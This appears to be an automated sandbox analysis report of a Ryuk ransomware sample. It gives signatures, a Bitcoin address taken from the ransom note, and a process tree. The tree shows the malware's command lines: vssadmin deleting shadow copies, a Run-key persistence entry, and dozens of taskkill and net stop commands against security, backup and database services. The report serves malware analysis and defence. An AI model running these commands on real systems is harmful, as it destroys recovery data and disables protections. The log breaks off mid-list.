Analysis
- max time kernel: 126s
- max time network: 21s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 17/04/2021, 13:15
Static task
- static1
Behavioral tasks
- behavioral1: sample dll64.dll, resource win7v20210408
- behavioral2: sample dll64.dll, resource win10v20210410
- behavioral3: sample svchost.exe, resource win7v20210408
- behavioral4: sample svchost.exe, resource win10v20210410
General
- Target: svchost.exe
Malware Config
- Extracted from: C:\RyukReadMe.txt
- Family: ryuk
- Value: 15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
- Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Executes dropped EXE (1 IoC)
  pid 1688, process aCBlj.exe
- Deletes itself (1 IoC)
  pid 1688, process aCBlj.exe
- Loads dropped DLL (1 IoC)
  pid 1240, process svchost.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (process reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\users\\Public\\aCBlj.exe" (process reg.exe)
- Enumerates connected drives (3 TTPs, 8 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by vssadmin.exe: \??\f:, \??\F:, \??\D:, \??\D:, \??\e:, \??\E:, \??\e:, \??\E:
- Suspicious use of SetThreadContext (1 IoC)
  PID 1652 (svchost.exe) set thread context of PID 1240 (procid_target 26)
- Drops file in Program Files directory (64 IoCs)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 15 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  vssadmin.exe pids: 2152, 1804, 1724, 3052, 1776, 2280, 652, 1784, 2696, 1656, 2112, 2388, 2304, 1580, 2348
- Kills process with taskkill (44 IoCs)
  taskkill.exe pids: 2264, 2508, 2544, 2876, 2924, 2108, 2956, 1668, 556, 2152, 2336, 2600, 2816, 1404, 1468, 1792, 328, 2068, 2756, 616, 1896, 1840, 540, 2380, 2420, 2628, 1596, 876, 1244, 2708, 2944, 2496, 2764, 2288, 664, 3000, 2208, 2296, 2460, 3028, 2272, 2016, 2060, 1372
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 1688, process aCBlj.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 1688, process aCBlj.exe
- Suspicious use of AdjustPrivilegeToken (48 IoCs)
  Token SeDebugPrivilege, taskkill.exe pids: 1372, 876, 1468, 1896, 1840, 616, 664, 1244, 1668, 540, 1792, 328, 2068, 2208, 2296, 2152, 2264, 2336, 2380, 2544, 2460, 2420, 2628, 2508, 2944, 2600, 2708, 2756, 3028, 2816, 2876, 2924, 3000, 2108, 2272, 2764, 2496, 2956, 1596, 1404, 2288, 2016, 2060, 556
  Token SeDebugPrivilege, pid 1688, process aCBlj.exe
  Token SeBackupPrivilege, pid 1312, process vssvc.exe
  Token SeRestorePrivilege, pid 1312, process vssvc.exe
  Token SeAuditPrivilege, pid 1312, process vssvc.exe
- Suspicious use of UnmapMainImage (1 IoC)
  pid 1124, process taskhost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Listed as source pid (process) -> target pid (procid_target), with the number of identical entries:
  1652 (svchost.exe) -> 1240 (26): 12 entries
  1240 (svchost.exe) -> 1688 (28): 4 entries
  1688 (aCBlj.exe) -> 1372 (31), 876 (33), 1468 (35), 1896 (37), 1840 (39), 664 (41), 616 (43), 1244 (45), 1668 (47), 540 (49), 1792 (51), 328 (54), 2068 (55), 2152 (58), 2208 (59), 2264 (62): 3 entries each
Processes
C:\Windows\system32\Dwm.exe (PID 1184)
  Command line: "C:\Windows\system32\Dwm.exe"
  - Drops file in Program Files directory
  C:\Windows\System32\cmd.exe (PID 2664)
    Command line: "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
    C:\Windows\system32\vssadmin.exe (PID 2696)
      Command line: vssadmin Delete Shadows /all /quiet
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 3052)
      Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 1656)
      Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 1776)
      Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2280)
      Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2112)
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 1804)
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Interacts with shadow copies
C:\Windows\system32\taskhost.exe (PID 1124)
  Command line: "taskhost.exe"
  - Drops file in Program Files directory
  - Suspicious use of UnmapMainImage
  C:\Windows\System32\cmd.exe (PID 2876)
    Command line: "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
    C:\Windows\system32\vssadmin.exe (PID 1724)
      Command line: vssadmin Delete Shadows /all /quiet
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2388)
      Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2348)
      Command line: vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2152)
      Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 652)
      Command line: vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 2304)
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 1580)
      Command line: vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
    C:\Windows\system32\vssadmin.exe (PID 1784)
      Command line: vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 1652)
  Command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\svchost.exe (PID 1240)
    Command line: "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\users\Public\aCBlj.exe (PID 1688)
      Command line: "C:\users\Public\aCBlj.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe
      - Executes dropped EXE
      - Deletes itself
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      Children of aCBlj.exe: 44 instances of C:\Windows\System32\taskkill.exe. Each is flagged with
      "Kills process with taskkill" and "Suspicious use of AdjustPrivilegeToken".
        PID 1372  "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
        PID 876   "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
        PID 1468  "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
        PID 1896  "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
        PID 1840  "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
        PID 664   "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
        PID 616   "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
        PID 1244  "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
        PID 1668  "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
        PID 540   "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
        PID 1792  "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
        PID 328   "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
        PID 2068  "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
        PID 2152  "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
        PID 2208  "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
        PID 2264  "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
        PID 2296  "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
        PID 2336  "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
        PID 2380  "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
        PID 2420  "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
        PID 2460  "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
        PID 2508  "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
        PID 2544  "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
        PID 2600  "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
        PID 2628  "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
        PID 2708  "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
        PID 2756  "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
        PID 2816  "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
        PID 2876  "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
        PID 2924  "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
        PID 2944  "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
        PID 3000  "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
        PID 3028  "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
        PID 2108  "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
        PID 2272  "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
        PID 2496  "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
        PID 2764  "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
        PID 2956  "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
        PID 1596  "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
        PID 2016  "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
        PID 1404  "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
        PID 2060  "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
        PID 2288  "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
        PID 556   "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
      Children of aCBlj.exe: C:\Windows\System32\net.exe service-stop commands. Each net.exe instance is run as
      "C:\Windows\System32\net.exe" stop <service> /y and spawns a C:\Windows\system32\net1.exe child run as
      C:\Windows\system32\net1 stop <service> /y. Columns: service, net.exe PID, net1.exe PID.
        "Acronis VSS Provider"               2184  1216
        "Enterprise Client Service"          3056  3044
        "Sophos Agent"                       984   2692
        "Sophos AutoUpdate Service"          2144  1100
        "Sophos Clean Service"               988   2436
        "Sophos Device Control Service"      2552  1348
        "Sophos File Scanner Service"        2784  996
        "Sophos Health Service"              2212  2252
        "Sophos MCS Agent"                   664   2188
        "Sophos MCS Client"                  2696  1108
        "Sophos Message Router"              616   2080
        "Sophos Safestore Service"           988   2208
        "Sophos System Protection Service"   1764  564
        "Sophos Web Control Service"         2436  364
        "SQLsafe Backup Service"             1576  2156
        "SQLsafe Filter Service"             2172  1792
        "Symantec System Recovery"           1604  2344
        "Veeam Backup Catalog Data Service"  1768  1348
        AcronisAgent                         2540  2520
        AcrSch2Svc                           1100  2220
        Antivirus                            924   1972
        BackupExecAgentAccelerator           2152  2316
        ARSM                                 2296  2368
        BackupExecAgentBrowser               2696  2980
        BackupExecDeviceMediaService         2188  2620
        BackupExecJobEngine                  2312  2720
        BackupExecManagementService          1216  2712
        BackupExecVSSProvider                3020  2392
        BackupExecRPCService                 1472  2144
        bedbg                                2916  988
        DCAgent                              2816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵PID:428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y4⤵PID:2836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y5⤵PID:2812
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y4⤵PID:2840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y5⤵PID:2332
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y4⤵PID:2988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y5⤵PID:2428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y4⤵PID:2172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y5⤵PID:2548
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y4⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵PID:2324
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y4⤵PID:796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y5⤵PID:2436
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y4⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y5⤵PID:3028
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y4⤵PID:2948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵PID:2964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y4⤵PID:2528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y4⤵PID:2980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y5⤵PID:2452
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y5⤵PID:2772
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y4⤵PID:2312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y5⤵PID:2248
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y4⤵PID:2412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:2416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y5⤵PID:3000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y4⤵PID:2420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y5⤵PID:428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y4⤵PID:2432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y5⤵PID:2392
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y4⤵PID:924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵PID:1100
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y4⤵PID:2872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y5⤵PID:2868
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y4⤵PID:2208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y5⤵PID:2128
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y4⤵PID:2812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y5⤵PID:2464
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y4⤵PID:2792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y5⤵PID:3024
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer100 /y4⤵PID:1032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y5⤵PID:1508
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer110 /y4⤵PID:3056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y5⤵PID:2004
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeES /y4⤵PID:2516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y5⤵PID:2560
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y4⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y5⤵PID:2896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y4⤵PID:2972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y5⤵PID:2588
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y4⤵PID:2760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y5⤵PID:2644
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y4⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y5⤵PID:796
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSRS /y4⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y5⤵PID:984
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y4⤵PID:2324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y5⤵PID:1668
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y4⤵PID:2756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y5⤵PID:1376
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y4⤵PID:2660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y5⤵PID:2292
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y4⤵PID:2160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y5⤵PID:2584
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y4⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y5⤵PID:2012
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y4⤵PID:2612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y5⤵PID:1652
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y4⤵PID:2512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y5⤵PID:664
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y4⤵PID:2448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y5⤵PID:2328
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵PID:1472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y5⤵PID:2672
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y4⤵PID:1540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y5⤵PID:2800
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y4⤵PID:1404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y5⤵PID:2880
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y4⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵PID:2964
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y4⤵PID:2664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y5⤵PID:2452
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y4⤵PID:2852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y5⤵PID:2280
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y4⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y5⤵PID:2380
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵PID:2948
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y5⤵PID:2240
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y4⤵PID:2620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y5⤵PID:764
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:3052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵PID:2640
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵PID:2744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y5⤵PID:2520
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y5⤵PID:2000
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:2264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y5⤵PID:924
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:1288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y5⤵PID:1172
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y4⤵PID:2996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y5⤵PID:2428
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y5⤵PID:2076
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLSERVER /y4⤵PID:1176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y5⤵PID:2320
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y4⤵PID:2748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y5⤵PID:2072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y4⤵PID:540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y5⤵PID:2560
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y4⤵PID:1256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y5⤵PID:3024
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL57 /y4⤵PID:564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y5⤵PID:2360
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y4⤵PID:1992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y5⤵PID:2912
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y4⤵PID:2692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y5⤵PID:1604
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y4⤵PID:1104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵PID:2896
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y4⤵PID:2832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y5⤵PID:1876
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y4⤵PID:2760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y5⤵PID:2260
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y4⤵PID:3032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵PID:984
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y4⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y5⤵PID:2344
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y4⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y5⤵PID:2104
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y4⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y5⤵PID:2648
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y4⤵PID:916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y5⤵PID:2820
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y4⤵PID:1576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y5⤵PID:876
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y4⤵PID:2288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y5⤵PID:2056
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y4⤵PID:928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y5⤵PID:3048
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y4⤵PID:1624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y5⤵PID:2468
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y4⤵PID:2656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y5⤵PID:1072
-
-
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y4⤵PID:2672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y5⤵PID:1296
-
-
-
